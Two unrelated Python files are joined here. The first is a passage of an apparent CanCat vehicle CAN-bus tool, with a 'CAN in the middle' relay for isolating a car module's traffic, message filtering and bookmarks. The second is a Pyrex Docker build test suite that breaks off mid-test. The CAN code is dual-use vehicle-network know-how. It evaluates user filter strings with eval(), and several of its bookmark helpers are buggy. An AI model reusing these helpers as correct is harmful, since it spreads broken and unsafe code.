MS-CAN - pins 3+ and 11- 95kbps
DW-FT-CAN - pins 1+ and 9- <125kbps
HS-CAN - pins 6+ and 14- 500kbps
'''
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_95KBPS)
def setCanBaudLSCAN(self):
self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
def __init__(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
'''
CAN in the middle. Allows the user to determine what CAN messages are being
sent by a device by isolating a device from the CAN network and using two
Can shields on one Arduino to relay the CAN messages to each other.
Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
CAN SPI | SPI CAN
|
| < Serial
PC
This solves the problem of not being able to determine which device is sending
which CAN message, since CAN messages have no source information and all messages
are broadcast.
The Can shield connected to the device is referred to as the isolation CanCat.
This CanCat should be modified so that the CS SPI pin is connected to D10, rather
than the default of D9. This is accomplished by cutting a trace on the circuit
board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
on their Wiki, but there shield differed slightly from my board. The CanCat
connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.
'''
self.bookmarks_iso = []
self.bookmark_info_iso = {}
CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
if load_filename is None:
self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list). Uses the isolation messages.
'''
messages = self._messages.get(CMD_ISO_RECV, [])
if stop == None:
stop = len(messages)
else:
stop = stop + 1
for idx in xrange(start, stop):
ts, msg = messages[idx]
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
continue
yield((idx, ts, arbid, data))
def getCanMsgCountIso(self):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
the number of CAN messages we've received on the isolation side session
'''
canmsgs = self._messages.get(CMD_ISO_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Prints session stats only for messages between two bookmarks
'''
print(self.getSessionStatsByBookmarkIso(start, stop))
def printSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print(self.getSessionStatsIso(start, stop))
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmarkIso(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop)
else:
stop_msg = self.getCanMsgCountIso()
return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgsIso(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
out = []
arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCountIso()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_ISO_RECV mailbox.
This also places a bookmark in the normal CAN message
stream.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_ISO_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks_iso)
self.bookmarks_iso.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info_iso[bkmk_index] = info #should this be msg_index? benefit either way?
CanInterface.placeCanBookmark(self, name=name, comment=comment)
return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
return bkmk_index
def setCanBookmarkNameIso(self, bkmk_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def snapshotCanMessagesIso(self, name=None, comment=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmarkIso("Start_" + name, comment)
input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmarkIso("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._locals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
continue
yield (idx, ts,arbid,msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print(self.reprCanMsgsByBookmarkIso(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters))
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print(self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters))
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
'''
out = []
if start_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(start_msg)
out.append("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
if stop_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(stop_msg)
out.append("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
diff = []
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
out.append(self.reprBookmarkIso(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
# check data
byte_cnt_diff = 0
if last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
else:
diff.append("TS_delta: %.3f" % delta_ts)
out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
last_ts = ts
last_msg = msg
out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIdsIso()
else:
arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print(self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters))
input("\nPress Enter to review the next Session...")
print
def printBookmarksIso(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarksIso())
def printAsciiStringsIso(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgsIso():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print(reprCanMsgIso(idx, ts, arbid, msg, repr(msg)))
def reprBookmarksIso(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks_iso)):
out.append(self.reprBookmarkIso(bid))
return '\n'.join(out)
def reprBookmarkIso(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks_iso[bid]
info = self.bookmark_info_iso.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
self.bookmarks_iso = me.get('bookmarks_iso')
self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'bookmarks_iso' : self.bookmarks_iso,
'bookmark_info_iso' : self.bookmark_info_iso,
'comments' : self.comments,
'file_version' : 1.0,
'class' : self.__class__,
'config' : self._config,
}
return savegame
######### administrative, supporting code ##########
cs = []
def cleanupInteractiveAtExit():
global cs
for c in cs:
try:
c.__del__()
except:
pass
def getDeviceFile():
import serial.tools.list_ports
for n, (port, desc, hwid) in enumerate(sorted(serial.tools.list_ports.comports()), 1):
if os.path.exists(port):
return port
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
global c
import atexit
c = InterfaceClass(port=port, load_filename=load_filename)
atexit.register(cleanupInteractiveAtExit)
if load_filename is None:
if can_baud != None:
c.setCanBaud(can_baud)
else:
c.setCanBaud(CAN_500KBPS)
gbls = globals()
lcls = locals()
try:
import IPython
ipsh = IPython.embed(banner1=intro, colors="neutral")
except ImportError as e:
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
from IPython.terminal.ipapp import load_default_config
ipsh = TerminalInteractiveShell(config=load_default_config())
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError as e:
try:
from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError as e:
print(e)
shell = code.InteractiveConsole(gbls)
shell.interact(intro)
|
test.py | #! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import configparser
import grp
import os
import pwd
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
import pty
PYREX_ROOT = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(PYREX_ROOT)
import pyrex # NOQA
TEST_PREBUILT_TAG_ENV_VAR = 'TEST_PREBUILT_TAG'
def skipIfPrebuilt(func):
def wrapper(self, *args, **kwargs):
if os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ''):
self.skipTest('Test does not apply to prebuilt images')
return func(self, *args, **kwargs)
return wrapper
class PyrexTest(object):
def setUp(self):
self.build_dir = os.path.abspath(os.path.join(PYREX_ROOT, 'build'))
def cleanup_build():
if os.path.isdir(self.build_dir):
shutil.rmtree(self.build_dir)
cleanup_build()
os.makedirs(self.build_dir)
self.addCleanup(cleanup_build)
conf_dir = os.path.join(self.build_dir, 'conf')
os.makedirs(conf_dir)
self.pyrex_conf = os.path.join(conf_dir, 'pyrex.ini')
def cleanup_env():
os.environ.clear()
os.environ.update(self.old_environ)
# OE requires that "python" be python2, not python3
self.bin_dir = os.path.join(self.build_dir, 'bin')
self.old_environ = os.environ.copy()
os.makedirs(self.bin_dir)
os.symlink('/usr/bin/python2', os.path.join(self.bin_dir, 'python'))
os.environ['PATH'] = self.bin_dir + ':' + os.environ['PATH']
os.environ['PYREX_DOCKER_BUILD_QUIET'] = '0'
self.addCleanup(cleanup_env)
self.thread_dir = os.path.join(self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()))
os.makedirs(self.thread_dir)
# Write out the default test config
conf = self.get_config()
conf.write_conf()
def get_config(self, defaults=False):
class Config(configparser.RawConfigParser):
def write_conf(self):
write_config_helper(self)
def write_config_helper(conf):
with open(self.pyrex_conf, 'w') as f:
conf.write(f)
config = Config()
if os.path.exists(self.pyrex_conf) and not defaults:
config.read(self.pyrex_conf)
else:
config.read_string(pyrex.read_default_config(True))
# Setup the config suitable for testing
config['config']['dockerimage'] = self.test_image
prebuilt_tag = os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, '')
if prebuilt_tag:
config['config']['pyrextag'] = prebuilt_tag
config['config']['buildlocal'] = '0'
else:
# Always build the latest image locally for testing. Use a tag that
# isn't present on docker hub so that any attempt to pull it fails
config['config']['pyrextag'] = 'ci-test'
config['config']['buildlocal'] = '1'
return config
def assertSubprocess(self, *args, capture=False, returncode=0, **kwargs):
if capture:
try:
output = subprocess.check_output(*args, stderr=subprocess.STDOUT, **kwargs)
except subprocess.CalledProcessError as e:
ret = e.returncode
output = e.output
else:
ret = 0
self.assertEqual(ret, returncode, msg='%s: %s' % (' '.join(*args), output.decode('utf-8')))
return output
else:
with subprocess.Popen(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs) as proc:
while True:
out = proc.stdout.readline().decode('utf-8')
if not out and proc.poll() is not None:
break
if out:
sys.stdout.write(out)
ret = proc.poll()
self.assertEqual(ret, returncode, msg='%s failed' % ' '.join(*args))
return None
def _write_host_command(self, args, quiet_init=False):
cmd_file = os.path.join(self.thread_dir, 'command')
with open(cmd_file, 'w') as f:
f.write('. ./poky/pyrex-init-build-env ')
if quiet_init:
f.write('> /dev/null 2>&1 ')
f.write('&& ')
f.write(' && '.join(list(args)))
return cmd_file
def _write_container_command(self, args):
cmd_file = os.path.join(self.thread_dir, 'container_command')
with open(cmd_file, 'w') as f:
f.write(' && '.join(args))
return cmd_file
def assertPyrexHostCommand(self, *args, quiet_init=False, **kwargs):
cmd_file = self._write_host_command(args, quiet_init)
return self.assertSubprocess(['/bin/bash', cmd_file], cwd=PYREX_ROOT, **kwargs)
def assertPyrexContainerShellCommand(self, *args, **kwargs):
cmd_file = self._write_container_command(args)
return self.assertPyrexHostCommand('pyrex-shell %s' % cmd_file, **kwargs)
def assertPyrexContainerCommand(self, cmd, **kwargs):
return self.assertPyrexHostCommand('pyrex-run %s' % cmd, **kwargs)
def assertPyrexContainerShellPTY(self, *args, returncode=0, env=None, quiet_init=False):
container_cmd_file = self._write_container_command(args)
host_cmd_file = self._write_host_command(['pyrex-shell %s' % container_cmd_file], quiet_init)
stdout = []
def master_read(fd):
while True:
data = os.read(fd, 1024)
if not data:
return data
stdout.append(data)
old_env = None
try:
if env:
old_env = os.environ.copy()
os.environ.clear()
os.environ.update(env)
status = pty.spawn(['/bin/bash', host_cmd_file], master_read)
finally:
if old_env is not None:
os.environ.clear()
os.environ.update(old_env)
self.assertFalse(os.WIFSIGNALED(status), msg='%s died from a signal: %s' %
(' '.join(args), os.WTERMSIG(status)))
self.assertTrue(os.WIFEXITED(status), msg='%s exited abnormally' % ' '.join(args))
self.assertEqual(os.WEXITSTATUS(status), returncode, msg='%s failed' % ' '.join(args))
return b''.join(stdout)
class PyrexImageType_base(PyrexTest):
"""
Base image tests. All images that derive from a -base image should derive
from this class
"""
def test_init(self):
self.assertPyrexHostCommand('true')
def test_pyrex_shell(self):
self.assertPyrexContainerShellCommand('exit 3', returncode=3)
def test_pyrex_run(self):
self.assertPyrexContainerCommand('/bin/false', returncode=1)
def test_disable_pyrex(self):
# Capture our cgroups
with open('/proc/self/cgroup', 'r') as f:
cgroup = f.read()
pyrex_cgroup_file = os.path.join(self.thread_dir, 'pyrex_cgroup')
# Capture cgroups when pyrex is enabled
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertNotEqual(cgroup, pyrex_cgroup)
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file, env=env)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertEqual(cgroup, pyrex_cgroup)
def test_quiet_build(self):
env = os.environ.copy()
env['PYREX_DOCKER_BUILD_QUIET'] = '1'
self.assertPyrexHostCommand('true', env=env)
def test_no_docker_build(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Docker will fail if invoked here
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexHostCommand('true', env=env)
# Verify that pyrex won't allow you to try and use docker later
output = self.assertPyrexHostCommand('PYREX_DOCKER=1 bitbake', returncode=1,
capture=True, env=env).decode('utf-8')
self.assertIn('Docker was not enabled when the environment was setup', output)
def test_bad_docker(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Verify that attempting to run build pyrex without docker shows the
# installation instructions
output = self.assertPyrexHostCommand('true', returncode=1, capture=True).decode('utf-8')
self.assertIn('Unable to run', output)
def test_ownership(self):
# Test that files created in docker are the same UID/GID as the user
# running outside
test_file = os.path.join(self.thread_dir, 'ownertest')
if os.path.exists(test_file):
os.unlink(test_file)
self.assertPyrexContainerShellCommand('echo "$(id -un):$(id -gn)" > %s' % test_file)
s = os.stat(test_file)
self.assertEqual(s.st_uid, os.getuid())
self.assertEqual(s.st_gid, os.getgid())
with open(test_file, 'r') as f:
(username, groupname) = f.read().rstrip().split(':')
self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name)
self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name)
def test_owner_env(self):
# This test is primarily designed to ensure that everything is passed
# correctly through 'pyrex run'
conf = self.get_config()
# Note: These config variables are intended for testing use only
conf['run']['uid'] = '1337'
conf['run']['gid'] = '7331'
conf['run']['username'] = 'theuser'
conf['run']['groupname'] = 'thegroup'
conf['run']['initcommand'] = ''
conf.write_conf()
# Make a fifo that the container can write into. We can't just write a
# file because it won't be owned by running user and thus can't be
# cleaned up
old_umask = os.umask(0)
self.addCleanup(os.umask, old_umask)
fifo = os.path.join(self.thread_dir, 'fifo')
os.mkfifo(fifo)
self.addCleanup(os.remove, fifo)
os.umask(old_umask)
output = []
def read_fifo():
nonlocal output
with open(fifo, 'r') as f:
output = f.readline().rstrip().split(':')
thread = threading.Thread(target=read_fifo)
thread.start()
try:
self.assertPyrexContainerShellCommand(
'echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP" > %s' % fifo)
finally:
thread.join()
self.assertEqual(output[0], '1337')
self.assertEqual(output[1], '7331')
self.assertEqual(output[2], 'theuser')
self.assertEqual(output[3], 'thegroup')
self.assertEqual(output[4], 'theuser')
self.assertEqual(output[5], 'thegroup')
def test_duplicate_binds(self):
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conf = self.get_config()
conf['run']['bind'] += ' %s %s' % (temp_dir, temp_dir)
conf.write_conf()
self.assertPyrexContainerShellCommand('true')
def test_bad_confversion(self):
# Verify that a bad config is an error
conf = self.get_config()
conf['config']['confversion'] = '0'
conf.write_conf()
self.assertPyrexHostCommand('true', returncode=1)
def test_conftemplate_ignored(self):
# Write out a template with a bad version in an alternate location. It
# should be ignored
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
conf['config']['confversion'] = '0'
with open(conftemplate, 'w') as f:
conf.write(f)
self.assertPyrexHostCommand('true')
def test_conf_upgrade(self):
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', env=env)
def test_bad_conf_upgrade(self):
# Write out a template in an alternate location, but it also fails to
# have a confversion
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
del conf['config']['confversion']
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', returncode=1, env=env)
def test_force_conf(self):
# Write out a new config file and set the variable to force it to be
# used
conf = self.get_config()
conf['config']['test'] = 'bar'
force_conf_file = os.path.join(self.thread_dir, 'force.ini')
with open(force_conf_file, 'w') as f:
conf.write(f)
# Set the variable to a different value in the standard config file
conf = self.get_config()
conf['config']['test'] = 'foo'
conf.write_conf()
output = self.assertPyrexHostCommand('pyrex-config get config:test', quiet_init=True,
capture=True).decode('utf-8').strip()
self.assertEqual(output, 'foo')
env = os.environ.copy()
env['PYREXCONFFILE'] = force_conf_file
output = self.assertPyrexHostCommand('pyrex-config get config:test', quiet_init=True,
capture=True, env=env).decode('utf-8').strip()
self.assertEqual(output, 'bar')
@skipIfPrebuilt
def test_local_build(self):
# Run any command to build the images locally
self.assertPyrexHostCommand('true')
conf = self.get_config()
# Trying to build with an invalid registry should fail
conf['config']['registry'] = 'does.not.exist.invalid'
conf.write_conf()
self.assertPyrexHostCommand('true', returncode=1)
# Disable building locally any try again (from the previously cached build)
conf['config']['buildlocal'] = '0'
conf.write_conf()
self.assertPyrexHostCommand('true')
def test_version(self):
self.assertRegex(pyrex.VERSION, pyrex.VERSION_REGEX, msg="Version '%s' is invalid" % pyrex.VERSION)
def test_version_tag(self):
tag = None
if os.environ.get('TRAVIS_TAG'):
tag = os.environ['TRAVIS_TAG']
else:
try:
tags = subprocess.check_output(['git', '-C', PYREX_ROOT, 'tag', '-l',
'--points-at', 'HEAD']).decode('utf-8').splitlines()
if tags:
tag = tags[0]
except subprocess.CalledProcessError:
pass
if not tag:
self.skipTest('No tag found')
self.assertEqual('v%s' % pyrex.VERSION, tag)
self.assertRegex(tag, pyrex.VERSION_TAG_REGEX, msg="Tag '%s' is invalid" % tag)
@skipIfPrebuilt
def test_tag_overwrite(self):
# Test that trying to build the image with a release-like tag fails
# (and doesn't build the image)
conf = self.get_config()
conf['config']['pyrextag'] = 'v1.2.3-ci-test'
conf.write_conf()
